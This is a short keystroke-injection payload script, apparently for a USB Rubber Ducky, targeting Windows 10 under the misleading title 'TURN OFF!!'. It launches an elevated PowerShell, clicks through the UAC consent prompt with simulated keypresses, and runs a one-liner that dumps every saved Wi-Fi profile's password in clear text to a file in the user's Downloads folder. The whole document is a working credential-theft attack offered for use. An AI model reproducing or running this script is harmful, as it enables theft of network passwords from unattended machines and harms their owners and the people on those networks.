REM Author: JHOJY
REM Title: TURN OFF!! 
REM Target: windows 10 

GUI r
DELAY 500
STRING powershell
CTRL+SHIFT+ENTER
DELAY 2000
LEFTARROW
DELAY 1000
ENTER
DELAY 500
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} |Format-Table -wrap | Format-Table -AutoSize >> $env:USERPROFILE\Downloads\SavedWiFiPass.txt
DELAY 500
ENTER
DELAY 300
STRING exit
ENTER

